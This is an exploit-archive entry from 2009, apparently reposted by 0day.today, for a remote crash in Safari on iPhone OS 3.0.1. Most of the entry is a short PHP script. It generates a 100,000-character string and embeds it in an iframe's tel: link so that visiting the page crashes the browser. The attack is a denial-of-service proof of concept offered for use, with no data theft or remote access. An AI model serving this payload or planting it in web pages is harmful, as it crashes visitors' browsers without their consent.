id: 7008
date: 09/13/2009
title: Apple Safari IPhone (using tel:) Remote Crash Exploit
author: cloud
cves: 

=====================================================
Safari Apple iPhone (using tel:) Remote Crash Exploit
=====================================================


# Apple Safari Iphone Crash using tel

# Tested on Iphone 3G, OS 3.0.1
# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear

# Exploit:

<?php
set_time_limit(0);
$var = "";
for ($i=0; $i<100000; $i++){
       $var = $var . "A";
}
echo '<iframe src="tel:' . $var .'"></iframe>';
?>


#  0day.today [2023-03-26]  #